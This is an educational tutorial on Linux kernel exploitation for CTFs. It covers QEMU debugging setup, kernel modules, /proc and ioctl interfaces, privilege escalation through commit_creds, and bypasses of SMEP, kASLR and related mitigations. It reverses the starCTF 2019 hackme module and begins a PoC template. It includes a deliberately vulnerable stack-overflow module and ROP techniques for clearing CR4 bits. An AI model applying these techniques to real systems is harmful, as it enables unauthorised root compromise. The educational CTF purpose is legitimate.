Linux Kernel Exploitation Tutorial

Intro

Kernel challenges have become very common in recent CTFs, and I found it difficult to keep up with my team’s pace. So I started my Linux kernel pwn journey.

Kernel exploitation is like remote code execution, except that it happens in kernel space and lets an attacker escalate from a normal account to root. Luckily, we don’t have to understand process scheduling or other hardcore internals. A background in libc pwning is enough to follow this post. The kernel suffers from the bug classes we already know: OOB, UAF, double free, and race conditions. However, the exploitation and the root causes are harder to understand.

In addition, the structure of a kernel module and the kernel APIs differ considerably from their userspace counterparts. We will talk about them soon. This post is partly about CTF and partly about real-world kernels; the latter part will be updated later.

Setup

I will use CTF challenges and some real-world examples instead of compiling a kernel myself. However, if you are interested in building one from scratch, you can go to this repo.

Usually, we debug the kernel in QEMU. Compared with VMware or VirtualBox, QEMU is more low-level, and it can also emulate other architectures such as ARM and MIPS. It can be installed easily through your package manager.

Load CTF Files to QEMU

A kernel challenge usually provides a start.sh that looks something like this:

qemu-system-x86_64 \
    -m 256M \
    -enable-kvm \
    -nographic \
    -kernel bzImage \
    -append 'console=ttyS0 loglevel=3 oops=panic panic=1 kaslr' \
    -monitor /dev/null \
    -initrd init.cpio \
    -smp cores=4,threads=4 \
    -cpu kvm64,smep

Some core options:

  • qemu-system-x86_64: emulate an x86_64 machine; other binaries exist for ARM, MIPS, and so on
  • -m: amount of guest memory
  • -enable-kvm: use KVM acceleration; startup will fail on hosts without KVM, such as QEMU on macOS or Windows
  • -kernel bzImage: use bzImage as the kernel image
  • -append: pass additional arguments on the kernel command line; kaslr enables the kASLR protection here
  • -initrd init.cpio: use init.cpio as the initial filesystem; we may need to edit its init script to start a shell as root
  • -cpu kvm64,smep: select the CPU model and enable the SMEP protection

If you want to debug the kernel via GDB, append an additional argument:

-gdb tcp::6789 
# the GDB remote stub listens on port 6789
# -s is equivalent to -gdb tcp::1234

To start a root shell, we need to modify /init or /etc/init.d/rcS inside init.cpio:

# decompress
mkdir fs
cd fs
cpio -idm < ../init.cpio

# edit /init
# or /etc/init.d/rcS
setsid /bin/cttyhack setuidgid 0 /bin/sh
# user: setsid /bin/cttyhack setuidgid 1000 /bin/sh

# repack the archive
find . -print0 | cpio --null -ov --format=newc > ../new.cpio

The bzImage is compressed, so we use the extract-vmlinux script to recover vmlinux from it for symbols and gadgets, then load the result into gdb and attach remotely:

$ ./extract-vmlinux bzImage > kernel
$ gdb kernel -q
gdb> target remote localhost:6789 # connect to kernel

A Quick Snap

A kernel is huge. Roughly, it has the following components:

  • Process Management
  • Memory Management
  • File System
  • Device Control
  • Networking
  • and many many more…

However, we don’t have to care about all of these components. Looking at the parts where userspace interacts with the kernel is enough to find bugs. Even after setting the rest aside, a large attack surface remains (drivers, ioctl, /proc, protocol implementations, virtualization).

I chose two of the most widely known attack surfaces: the /proc file system and the ioctl function. They are friendlier to beginners, and the exploitation techniques carry over to other attack surfaces. Once you understand them, you can investigate the harder parts yourself.

The kernel space and userspace APIs are quite different; we will introduce them later.

Kernel Module

A kernel module is a binary that the Linux kernel can load and unload at runtime. Drivers (those manipulated through ioctl) and code that registers /proc entries, for example, are commonly shipped as kernel modules. Here are some basic operations on kernel modules:

lsmod # show currently loaded modules
modinfo name # show modules info
insmod name # install a module
rmmod name # remove a module

Usually, a CTF challenge will provide you with an XXX.ko file. That is a kernel module, and you need to load it manually with insmod.

To write a kernel module, we need to follow a specific form to register our functions. Also, the functions we call are quite different from those in userspace:

#include <linux/module.h>	
#include <linux/kernel.h>
#include <linux/init.h>	
static int __init test_module_init(void)
{
	printk(KERN_INFO "Init\n");
	return 0;
}

static void __exit test_module_exit(void)
{
	printk(KERN_INFO "Quit\n");
}

module_init(test_module_init);
module_exit(test_module_exit);

We use the __init and __exit macros to mark the functions as init and exit functions, and register them via module_init and module_exit. The module prints Init to the kernel log when it is loaded and Quit when it is removed.

You probably noticed that we use printk instead of printf here. That’s because printf is a userspace libc function, and libc is not available in kernel space, so the kernel provides printk as its replacement. There are many such substitutions; we will talk about them later.

Now you have a rough understanding of kernel modules. Don’t look for main in a module binary. If you want to know more about basic kernel programming, go to here.

proc

The proc filesystem is a special file system that exposes system information. It retrieves information from the kernel and hands it to userspace through a file descriptor. When you write a buffer to a proc file, the kernel calls the write handler registered by the module, which reads and processes the input.

An example from kernel_exploit_world:

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/string.h>
#include <linux/vmalloc.h>
#include <linux/sched.h>
#include <linux/uaccess.h>

struct proc_dir_entry *proc_file_entry;
uint64_t rbx, rbp;
// Buggy write handling
int buggy_write(struct file *file,
        const char *buf,
        unsigned long len) {

    char data[8];
    copy_from_user(data, buf, len);
    printk(" buggy_write %s data=(%p) len=%d\n", buf,(void*)data, len);
    return len;
}

static struct file_operations buggy_proc_fops = {
  .write = buggy_write,
};

int init_module()
{
    printk(" module started\n");
    printk(" creating proc entry @ /proc/buggy\n");

    // handle anything written to /proc/buggy
    // pass it to buggy_write
    proc_file_entry = proc_create("buggy", 0666, NULL, &buggy_proc_fops);

    return 0;
}

void cleanup_module()
{
    remove_proc_entry("buggy", NULL);
}

The module implements buggy_write. When the user writes more than 8 bytes, copy_from_user runs past the 8-byte stack buffer data. The exploitation part will be explained later. Let’s take a look at the /proc module first.

At the beginning, we use proc_create to create a custom proc entry and register buggy_write as its write function. If we wanted to read from the proc entry, we could implement .read. Besides printk, we use another kernel function here, copy_from_user. It is a memcpy-like function that copies data from userspace into kernel space; plain memcpy should only be used between two kernel-space buffers. To copy a buffer to userspace instead, we call copy_to_user.

For heap management, we use kmalloc and kfree in place of malloc and free.
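
To make the missing check concrete, here is a small userspace sketch of what a length-checked handler could look like. It is only an analogue under my own assumptions: checked_write and DATA_SIZE are hypothetical names, and memcpy stands in for copy_from_user, which a real module would call instead (and whose return value it would also check).

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define DATA_SIZE 8  /* same size as the data array in buggy_write */

/*
 * Userspace stand-in for a length-checked write handler.
 * memcpy plays the role of copy_from_user here.
 * Returns the number of bytes copied, or -1 if the request is too large.
 */
long checked_write(char *data, const char *user_buf, size_t len)
{
    assert(data != NULL && user_buf != NULL);

    if (len > DATA_SIZE)
        return -1;              /* reject instead of overflowing the buffer */

    memcpy(data, user_buf, len);
    return (long)len;
}
```

With this check in place, a 16-byte write is rejected instead of running past the 8-byte buffer.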

ioctl

ioctl provides an interface for users to interact with a device, which means a user can indirectly manipulate or corrupt kernel space. Let’s look at an ioctl sample from how2kernel; I removed part of the code to make it more compact:

#include <linux/kernel.h>
#include <linux/module.h>	/* Specifically, a module */
#include <linux/fs.h>
#include <asm/uaccess.h>	/* for get_user and put_user */

#include "ioctl.h"
#define SUCCESS 0
#define DEVICE_NAME "char_dev"
#define BUF_LEN 80

/* 
 * Is the device open right now? Used to prevent
 * concurent access into the same device 
 */
static int Device_Open = 0;

/* 
 * The message the device will give when asked 
 */
static char Message[BUF_LEN];

/* 
 * How far did the process reading the message get?
 * Useful if the message is larger than the size of the
 * buffer we get to fill in device_read. 
 */
static char *Message_Ptr;

/* 
 * This is called whenever a process attempts to open the device file 
 */
static int device_open(struct inode *inode, struct file *file)
{

  /* 
   * We don't want to talk to two processes at the same time 
   */
  if (Device_Open)
    return -EBUSY;

  Device_Open++;
  /*
   * Initialize the message 
   */
  Message_Ptr = Message;
  try_module_get(THIS_MODULE);
  return SUCCESS;
}

static int device_release(struct inode *inode, struct file *file)
{

  /* 
   * We're now ready for our next caller 
   */
  Device_Open--;

  module_put(THIS_MODULE);
  return SUCCESS;
}

/* 
 * This function is called whenever a process which has already opened the
 * device file attempts to read from it.
 */
static ssize_t device_read(struct file *file,	/* see include/linux/fs.h   */
			   char __user * buffer,	/* buffer to be
							 * filled with data */
			   size_t length,	/* length of the buffer     */
			   loff_t * offset)
{
  /* 
   * Number of bytes actually written to the buffer 
   */
  int bytes_read = 0;

  /* 
   * If we're at the end of the message, return 0
   * (which signifies end of file) 
   */
  if (*Message_Ptr == 0)
    return 0;

  /* 
   * Actually put the data into the buffer 
   */
  while (length && *Message_Ptr) {

    /* 
     * Because the buffer is in the user data segment,
     * not the kernel data segment, assignment wouldn't
     * work. Instead, we have to use put_user which
     * copies data from the kernel data segment to the
     * user data segment. 
     */
    put_user(*(Message_Ptr++), buffer++);
    length--;
    bytes_read++;
  }

  /* 
   * Read functions are supposed to return the number
   * of bytes actually inserted into the buffer 
   */
  return bytes_read;
}

/* 
 * This function is called when somebody tries to
 * write into our device file. 
 */
static ssize_t
device_write(struct file *file,
	     const char __user * buffer, size_t length, loff_t * offset)
{
	int i;

	for (i = 0; i < length && i < BUF_LEN; i++)
		get_user(Message[i], buffer + i);

	Message_Ptr = Message;

	/* 
	 * Again, return the number of input characters used 
	 */
	return i;
}

long device_ioctl(struct file *file,
                  unsigned int ioctl_num,	/* number and param for ioctl */
                  unsigned long ioctl_param)
{
	int i;
	char *temp;
	char ch;

	/* 
	 * Switch according to the ioctl called
	 */
	switch (ioctl_num) {
	case IOCTL_SET_MSG:
		/* 
		 * Receive a pointer to a message (in user space) and set that
		 * to be the device's message.  Get the parameter given to 
		 * ioctl by the process. 
		 */
		temp = (char *)ioctl_param;

		/* 
		 * Find the length of the message 
		 */
		get_user(ch, temp);
		for (i = 0; ch && i < BUF_LEN; i++, temp++)
			get_user(ch, temp);

		device_write(file, (char *)ioctl_param, i, 0);
		break;

	case IOCTL_GET_MSG:
		/* 
		 * Give the current message to the calling process - 
		 * the parameter we got is a pointer, fill it. 
		 */
		i = device_read(file, (char *)ioctl_param, 99, 0);

		/* 
		 * Put a zero at the end of the buffer, so it will be 
		 * properly terminated 
		 */
		put_user('\0', (char *)ioctl_param + i);
		break;

	case IOCTL_GET_NTH_BYTE:
		/* 
		 * This ioctl is both input (ioctl_param) and 
		 * output (the return value of this function) 
		 */
		return Message[ioctl_param];
		break;
	}

	return SUCCESS;
}

/* 
 * This structure will hold the functions to be called
 * when a process does something to the device we
 * created. Since a pointer to this structure is kept in
 * the devices table, it can't be local to
 * init_module. NULL is for unimplemented functions. 
 */
struct file_operations Fops = {
	.read = device_read,
	.write = device_write,
	.unlocked_ioctl = device_ioctl,
	.open = device_open,
	.release = device_release,	/* a.k.a. close */
};

/* 
 * Initialize the module - Register the character device 
 */
int init_module()
{
	int ret_val;
	/* 
	 * Register the character device (atleast try) 
	 */
	ret_val = register_chrdev(MAJOR_NUM, DEVICE_NAME, &Fops);

	/* 
	 * Negative values signify an error 
	 */
	if (ret_val < 0) {
		printk(KERN_ALERT "%s failed with %d\n",
		       "Sorry, registering the character device ", ret_val);
		return ret_val;
	}

	return 0;
}

void cleanup_module()
{
  unregister_chrdev(MAJOR_NUM, DEVICE_NAME);
}

Basically, it simulates operating a device. An additional operation, unlocked_ioctl, is implemented and exposed to userspace.

We can use ioctl to manipulate the device, for example:

#include "ioctl.h"

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>		/* open */
#include <unistd.h>		/* exit */
#include <sys/ioctl.h>		/* ioctl */

void
ioctl_set_msg(int file_desc, char *message)
{
  int ret_val;

  ret_val = ioctl(file_desc, IOCTL_SET_MSG, message);

  if (ret_val < 0) {
    printf("ioctl_set_msg failed:%d\n", ret_val);
    exit(-1);
  }
}

void
ioctl_get_msg(int file_desc)
{
  int ret_val;
  char message[100];

  ret_val = ioctl(file_desc, IOCTL_GET_MSG, message);

  if (ret_val < 0) {
    printf("ioctl_get_msg failed:%d\n", ret_val);
    exit(-1);
  }

  printf("get_msg message:  %s\n", message);
}

void
ioctl_get_nth_byte(int file_desc)
{
  int i;
  char c;

  printf("get_nth_byte message: ");

  i = 0;
  do {
    c = ioctl(file_desc, IOCTL_GET_NTH_BYTE, i++);

    if (c < 0) {
      printf
        ("ioctl_get_nth_byte failed at the %d'th byte:\n",
         i);
      exit(-1);
    }

    putchar(c);
  } while (c != 0);
  putchar('\n');
}

int
main()
{
  int file_desc;
  char *msg = "Message passed by ioctl\n";

  file_desc = open(DEVICE_FILE_NAME, 0);
  if (file_desc < 0) {
    printf("Can't open device file: %s\n", DEVICE_FILE_NAME);
    exit(-1);
  }

  ioctl_get_nth_byte(file_desc);
  ioctl_get_msg(file_desc);
  ioctl_set_msg(file_desc, msg);

  close(file_desc);
}
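
The ioctl.h header shared by the module and the client is not shown above. Headers like it usually build request numbers with the _IOR/_IOW macros, which pack a direction, a magic number, a command number, and an argument size into one integer. A hedged sketch of that encoding follows; DEMO_MAGIC, the DEMO_* requests, struct ioctl_fields, and decode_ioctl are made-up names for illustration, not the sample’s real definitions.

```c
#include <assert.h>
#include <stddef.h>
#include <linux/ioctl.h>   /* _IOR, _IOW, _IOC_DIR, _IOC_TYPE, _IOC_NR, _IOC_SIZE */

#define DEMO_MAGIC   100                          /* hypothetical magic number */
#define DEMO_SET_MSG _IOW(DEMO_MAGIC, 0, char *)  /* data flows userspace -> kernel */
#define DEMO_GET_MSG _IOR(DEMO_MAGIC, 1, char *)  /* data flows kernel -> userspace */

struct ioctl_fields {
    unsigned int dir;   /* _IOC_READ, _IOC_WRITE, or both */
    unsigned int type;  /* magic number */
    unsigned int nr;    /* command number */
    unsigned int size;  /* size of the argument type */
};

/* Split a request number back into the four fields the macros packed. */
void decode_ioctl(unsigned long request, struct ioctl_fields *out)
{
    assert(out != NULL);
    out->dir  = _IOC_DIR(request);
    out->type = _IOC_TYPE(request);
    out->nr   = _IOC_NR(request);
    out->size = _IOC_SIZE(request);
}
```

Drivers are free to ignore this convention. The hackme module later in this post simply uses the raw values 0x30000 to 0x30003.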

Context Switching

Since userspace and kernel space run at different privilege levels with different memory permissions, we need special instructions to switch between them.

To switch from userspace to kernel space, we use syscall. You can treat it as a call instruction into the kernel.

Switching back to userspace is a little different. Usually, we need to execute these two instructions:

swapgs
iretq

swapgs exchanges the current GS base register value with the value stored in the IA32_KERNEL_GS_BASE MSR. In kernel mode, GS references kernel data structures, so it has to be swapped back before returning to userspace.

iretq takes us to userspace. Besides RIP, it restores four more registers from the stack: CS, RFLAGS, RSP, and SS. The stack therefore looks like this:

|---------|
| RIP     | -> instruction address
|---------|
| CS      | -> code segment
|---------|
| RFLAGS  | -> flags for system status
|---------|
| RSP     | -> stack pointer
|---------|
| SS      | -> stack segment
|---------|

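From a kernel exploiter’s perspective, we usually set RIP to a function that spawns a shell, and RSP to an mmap'd region that serves as the stack. A helper function can save the current userspace values for us:

size_t user_cs, user_ss, user_rflags, user_sp;

// Save the userspace segment selectors, stack pointer, and flags so that
// they can be placed in the iretq frame later.
// The asm uses Intel syntax: compile with gcc -masm=intel.
void save_status()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
}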
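
Once those values are saved, the five-slot frame that iretq expects can be appended to the end of a ROP chain. The sketch below only shows the ordering; struct user_state and push_iret_frame are hypothetical helpers of mine, and the chain is modelled as a plain array of 64-bit slots.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Values captured in userspace before triggering the bug. */
struct user_state {
    uint64_t cs, ss, rsp, rflags;
};

/*
 * Append the frame popped by iretq, in stack order:
 * RIP, CS, RFLAGS, RSP, SS. Returns the new chain length.
 */
size_t push_iret_frame(uint64_t *chain, size_t n, uint64_t user_rip,
                       const struct user_state *st)
{
    assert(chain != NULL && st != NULL);

    chain[n++] = user_rip;    /* where execution resumes in userspace */
    chain[n++] = st->cs;
    chain[n++] = st->rflags;
    chain[n++] = st->rsp;     /* userspace stack to switch to */
    chain[n++] = st->ss;
    return n;
}
```

In a full chain, the addresses of the swapgs and iretq gadgets go in the slots right before this frame.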

Privilege Transfer

If we can control the kernel’s control flow, what should we do with it? How can we make use of kernel permissions? The answer is to change the privileges of the current process from kernel space.

Process data is stored in struct task_struct, and the current process is referenced by the pointer current. Its cred field holds the credentials, including euid. Once current->cred->euid is set to 0, the current process is treated as having root privileges:

struct thread_info {
	struct task_struct	*task;	/* main task structure */
	__u32			flags;		/* low level flags */
	__u32			status;		/* thread synchronous flags */
	__u32			cpu;		/* current CPU */
	mm_segment_t		addr_limit;
	unsigned int		sig_on_uaccess_error:1;
	unsigned int		uaccess_err:1;	/* uaccess failed */
};

struct task_struct {
	volatile long state; /* -1 unrunnable, 0 runnable, >0 stopped*/
	void *stack;
	atomic_t usage;
	unsigned int flags;	/* per process flags, defined below */
	unsigned int ptrace;
	...
	/* process credentials */
	const struct cred __rcu *ptracer_cred; /* Tracer's credentials at attach */
	const struct cred __rcu *real_cred; /* objective and real 
	subjective task credentials (COW) */
	const struct cred __rcu *cred;	/* effective (overridable) 
	subjective task credentials (COW) */
	char comm[TASK_COMM_LEN]; /* executable name excluding path
				     - access with [gs]et_task_comm (which lock
				       it with task_lock())
				     - initialized normally by setup_new_exec */
/* file system info */
	struct nameidata *nameidata;
#ifdef CONFIG_SYSVIPC
/* ipc stuff */
	struct sysv_sem sysvsem;
	struct sysv_shm sysvshm;
#endif
};

struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key __rcu *session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	struct rcu_head	rcu;		/* RCU deletion hook */
};

We don’t need to locate current->cred->euid manually (although sometimes you might have to brute-force it); commit_creds and prepare_kernel_cred handle that for us. The whole thing fits in one line of code:

commit_creds(prepare_kernel_cred(0));

We cannot spawn a shell or read root-owned files directly from kernel context, so we have to return to a userspace process for any post-exploitation work.

This sounds quite easy, but our payload actually needs to bypass some modern mitigations, which will be introduced later. Still, this is the key idea of a kernel payload.

Kernel Mitigation

Besides the restricted kernel space APIs, another characteristic of kernel exploitation is its exploit mitigations. We will first review the mitigations that exist in both userspace and kernel space, and then introduce the kernel-only ones.

Common Mitigations

  • NX: the stack is not executable, so we need to write ROP chains.
  • Stack Canary: overflow protection; we have to leak the canary before we can hijack control flow.
  • ASLR: address randomization; the kernel version is called kASLR.

Kernel Address Display Restriction

/proc/kallsyms lists the addresses and symbols of the Linux kernel, and on older versions anyone could simply read it to get that information. However, /proc/sys/kernel/kptr_restrict is now set to 1 by default to prevent this leak, in which case unprivileged users see zeroed addresses.
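
When the file is readable (for example from the root shell of our debug VM), each line has the form address, type, name, and optionally a module name. A minimal parsing sketch, assuming that line format; parse_kallsyms_line and match_symbol are hypothetical helper names:

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Parse one line of the form "<hex address> <type> <name> [module]".
 * name must have room for 128 bytes. Returns 1 on success, 0 otherwise.
 */
int parse_kallsyms_line(const char *line, unsigned long long *addr,
                        char *type, char *name)
{
    assert(line && addr && type && name);
    return sscanf(line, "%llx %c %127s", addr, type, name) == 3;
}

/* If line describes the symbol wanted, store its address and return 1. */
int match_symbol(const char *line, const char *wanted,
                 unsigned long long *addr)
{
    char type, name[128];
    unsigned long long a;

    assert(wanted && addr);
    if (!parse_kallsyms_line(line, &a, &type, name) ||
        strcmp(name, wanted) != 0)
        return 0;

    *addr = a;
    return 1;
}
```

Feeding each line of /proc/kallsyms (read with fgets) to match_symbol gives a tiny symbol resolver. If the resolved address is 0, pointers are being hidden from the current user.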

SMAP/SMEP

SMAP and SMEP stand for Supervisor Mode Access Prevention and Supervisor Mode Execution Prevention. Their ARM counterparts are PAN and PXN, respectively.

When you type vmmap in gdb, you will see two special memory segments, vdso and vsyscall (Virtual Dynamic Shared Object and Virtual System Call; the former uses a shared object to map memory pages into different processes). These two regions were introduced to speed up Linux. If a system call is used frequently, it is cached in these regions, which reduces the number of switches between kernel space and userspace. We could cache malicious code from a userspace process and eventually let the kernel execute it.

SMAP prevents the kernel from accessing userspace memory, and SMEP prevents it from executing userspace code. We can check whether the CPU supports them via:

cat /proc/cpuinfo | grep smap # or smep

Address Protection

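This prevents userspace from mapping memory at very low addresses, starting from 0. The reason is simple: a NULL pointer dereference in the kernel accesses address 0, so an attacker who could map that page would control what the kernel finds there.

We can check the minimum address with cat /proc/sys/vm/mmap_min_addr.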

KPTI

KPTI stands for kernel page-table isolation. Without it, Linux keeps kernel memory mapped in the page tables while a userspace program runs, which improves performance. These mappings are protected from user mode and only become accessible when a system call or interrupt occurs. The famous Meltdown vulnerability abuses them to leak kernel data. With KPTI enabled, the page tables used in user mode no longer contain most of the kernel mappings.

However, this technique has a relatively high performance cost, so some kernels are built or booted with it disabled.

To find out whether it is enabled, use:

dmesg -wH | grep 'Kernel/User page tables isolation'

Mitigation Bypass

Before debugging and writing our own exploit, let’s review how to bypass the mitigations above.

ret2user

Condition: Disabled SMEP

ret2user is like a kernel version of ret2libc, and it can only be used when SMEP is disabled. It relies on the fact that userspace cannot execute kernel-space code, but kernel space can execute userspace code (as long as SMEP is disabled). Thus, we can mmap a region in userspace, place commit_creds(prepare_kernel_cred(0)) shellcode in it, and redirect kernel execution to that region.
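
A ret2user payload is often written as an ordinary C function inside the exploit, calling the two kernel functions through function pointers. The following is a sketch under assumptions: the typedefs are my own model of the two functions (with opaque void * instead of the real struct types), the real addresses would have to come from a leak or from /proc/kallsyms, and the stub_* functions exist only so that the call chain can be dry-run in userspace.

```c
#include <assert.h>
#include <stddef.h>

typedef void *(*prepare_kernel_cred_fn)(void *daemon);
typedef int (*commit_creds_fn)(void *new_cred);

/* Filled in at runtime with the resolved kernel addresses. */
static prepare_kernel_cred_fn prepare_kernel_cred_ptr;
static commit_creds_fn commit_creds_ptr;

void set_kernel_symbols(prepare_kernel_cred_fn prepare, commit_creds_fn commit)
{
    assert(prepare != NULL && commit != NULL);
    prepare_kernel_cred_ptr = prepare;
    commit_creds_ptr = commit;
}

/* The function that the hijacked kernel control flow would jump to. */
void escalate_privileges(void)
{
    commit_creds_ptr(prepare_kernel_cred_ptr(NULL));
}

/* Userspace stubs for a dry run; they only record that the chain was called. */
int stub_token;
int stub_commit_calls;

void *stub_prepare_kernel_cred(void *daemon)
{
    (void)daemon;
    return &stub_token;
}

int stub_commit_creds(void *new_cred)
{
    if (new_cred == &stub_token)
        stub_commit_calls++;
    return 0;
}
```

In a real exploit, set_kernel_symbols would receive the leaked addresses cast to the two function pointer types, and the kernel would be redirected to escalate_privileges.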

SMEP Bypass

When SMEP is enabled, bit 20 of the CR4 register is 1 (and bit 21 of CR4 is 1 if SMAP is enabled). We can use ROP to clear them:

pop r??
mov cr4, r??

To do kROP, we need to search for gadgets in vmlinux, which can be extracted with extract-vmlinux.

The magic value 0x6f0 is handy here, since it is a CR4 value with both bits cleared: load 0x6f0 into the popped register and move it into CR4. We can then continue the ROP chain to execute commit_creds(prepare_kernel_cred(0)).
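
The value to load into CR4 is simply the current value with bits 20 and 21 cleared. A small sketch of that arithmetic, with macro and function names of my own choosing:

```c
#include <assert.h>
#include <stdint.h>

#define CR4_SMEP (1ULL << 20)  /* Supervisor Mode Execution Prevention */
#define CR4_SMAP (1ULL << 21)  /* Supervisor Mode Access Prevention */

int cr4_has_smep(uint64_t cr4) { return (cr4 & CR4_SMEP) != 0; }
int cr4_has_smap(uint64_t cr4) { return (cr4 & CR4_SMAP) != 0; }

/* Compute the value a "pop reg; mov cr4, reg" chain should load. */
uint64_t cr4_without_smep_smap(uint64_t cr4)
{
    uint64_t out = cr4 & ~(CR4_SMEP | CR4_SMAP);

    assert(!cr4_has_smep(out) && !cr4_has_smap(out));
    return out;
}
```

For example, a CR4 of 0x3006f0 has both protections enabled, and clearing the two bits leaves 0x6f0.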

Address Display Protection Bypass

Unfortunately, there is no shortcut here: we have to leak a kernel address first, and then apply the methods above to get a shell.

Some Other Tips

Unlike traditional pwn, the kernel is more likely to suffer from race conditions. For example, a user can open a device twice, and the device might implement its close handler incorrectly.

Double fetch is a classic race condition in which the user uses threads to modify data after the kernel has already read it once. In traditional pwn such issues are more explicit than in kernel challenges: you can probably guess there is a race condition when a challenge uses threads.

Also, besides changing the cred struct to escalate privileges, we can overwrite the tty_operations pointer of a tty_struct. That lets us hijack a function pointer (e.g. tty_struct->tty_operations->write) to jump to an arbitrary address, and then use a few gadgets to pivot the stack into a ROP chain.

Exploitation

We will use the hackme challenge from starCTF 2019 as an example.

Modify /etc/init.d/rcS and add the gdb remote debug option to startvm.sh as described above. Once the VM boots into a root shell, your debug environment is ready.

Reverse the Module

Let’s reverse the binary first:

signed __int64 __fastcall hackme_ioctl(__int64 fd, unsigned int _opt, __int64 _arg)
{
  __int64 v4; // rsi
  __int64 *_store_loc; // rbx
  signed __int64 _dest; // rbx MAPDST
  __int64 _ptr; // rdi MAPDST
  __int64 *_ptr_dest; // rbx MAPDST
  __int64 _kernel_ptr; // rax
  unsigned int idx; // [rsp+0h] [rbp-38h]
  __int64 user_ptr; // [rsp+8h] [rbp-30h] MAPDST
  __int64 size; // [rsp+10h] [rbp-28h] MAPDST
  __int64 offset; // [rsp+18h] [rbp-20h]

  v4 = _arg;
  copy_from_user(&idx, _arg, 0x20LL);
  if ( _opt == 0x30001 )                        // free
  {
    _dest = 2LL * idx;
    _ptr = pool[_dest];
    _ptr_dest = &pool[_dest];
    if ( _ptr )
    {
      kfree(_ptr, v4);
      *_ptr_dest = 0LL;
      return 0LL;
    }
    return -1LL;
  }
  if ( _opt > 0x30001 )
  {
    if ( _opt == 0x30002 )
    {
      _dest = 2LL * idx;
      _ptr = pool[_dest];
      _ptr_dest = &pool[_dest];
      if ( _ptr && offset + size <= (unsigned __int64)_ptr_dest[1] )
      {
        copy_from_user(offset + _ptr, user_ptr, size);
        return 0LL;
      }
    }
    else if ( _opt == 0x30003 )
    {
      _dest = 2LL * idx;
      _ptr = pool[_dest];
      _ptr_dest = &pool[_dest];
      if ( _ptr )
      {
        if ( offset + size <= (unsigned __int64)_ptr_dest[1] )
        {
          copy_to_user(user_ptr, offset + _ptr, size);
          return 0LL;
        }
      }
    }
    return -1LL;
  }
  if ( _opt != 0x30000 )
    return -1LL;
  _store_loc = &pool[2 * idx];
  if ( *_store_loc )
    return -1LL;
  _kernel_ptr = _kmalloc(size, 0x6000C0LL);
  if ( !_kernel_ptr )
    return -1LL;
  *_store_loc = _kernel_ptr;
  copy_from_user(_kernel_ptr, user_ptr, size);
  _store_loc[1] = size;
  return 0LL;
}

This is another heap challenge, but in the kernel. The variables without a _ prefix are provided from userspace. In short, it implements an ioctl that can allocate, free, write, and read chunks. Notice this check:

      if ( _ptr && offset + size <= (unsigned __int64)_ptr_dest[1] )
      {
        copy_from_user(offset + _ptr, user_ptr, size);
        return 0LL;
      }

The check uses <=, which at first glance looks like an off-by-one, but offset + size <= length is the correct bound for writing size bytes at offset. The real problem is that offset is a signed value and is never checked against 0, so a negative offset passes the comparison and gives us OOB access in front of the chunk. Since the kernel heap freelist behaves much like fastbin, we can follow the traditional heap playbook: leak a kernel address, overwrite fd to reach and edit cred, and eventually get a root shell.
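
To see why a negative offset slips through, the comparison can be replayed in userspace. This is a sketch with hypothetical function names; passes_module_check mirrors the decompiled test (the sum wraps modulo 2^64 and is compared as unsigned), while stays_in_chunk is what a safe check would have to establish.

```c
#include <assert.h>
#include <stdint.h>

/* Mirrors the module: offset + size <= stored chunk size, compared as unsigned. */
int passes_module_check(int64_t offset, uint64_t size, uint64_t chunk_size)
{
    return (uint64_t)offset + size <= chunk_size;
}

/* True only when the access really stays inside [0, chunk_size). */
int stays_in_chunk(int64_t offset, uint64_t size, uint64_t chunk_size)
{
    assert(chunk_size <= (uint64_t)INT64_MAX);

    if (offset < 0 || (uint64_t)offset > chunk_size)
        return 0;
    return size <= chunk_size - (uint64_t)offset;
}
```

With offset = -0x200 and size = 0x200 the sum is 0, so the module accepts the request even though every byte of the access lies in front of the chunk.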

Preparing PoC

We can write a minimal template first:

#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <sys/prctl.h>
#include <memory.h>
#include <string.h>
#include <assert.h>

int fd;
struct UserArg {
  unsigned int idx;
  char *user_ptr;
  size_t size;
  size_t offset;
} arg;

#define BUF_SIZE 0x100000L

char buf[BUF_SIZE] = {0};

void init() {
  fd = open("/dev/hackme", 0);
  if (fd < 0)
    exit(-1);

  arg.user_ptr = buf;
}

void kmalloc(unsigned int idx, char ch, size_t size) {
  memset(buf, ch, sizeof(buf)); 
  arg.idx = idx;
  arg.size = size;
  int res = ioctl(fd, 0x30000, &arg);
  assert(res >= 0);
}

void kfree(unsigned int idx) {
  arg.idx = idx;
  int res = ioctl(fd, 0x30001, &arg);
  assert(res >= 0);
}

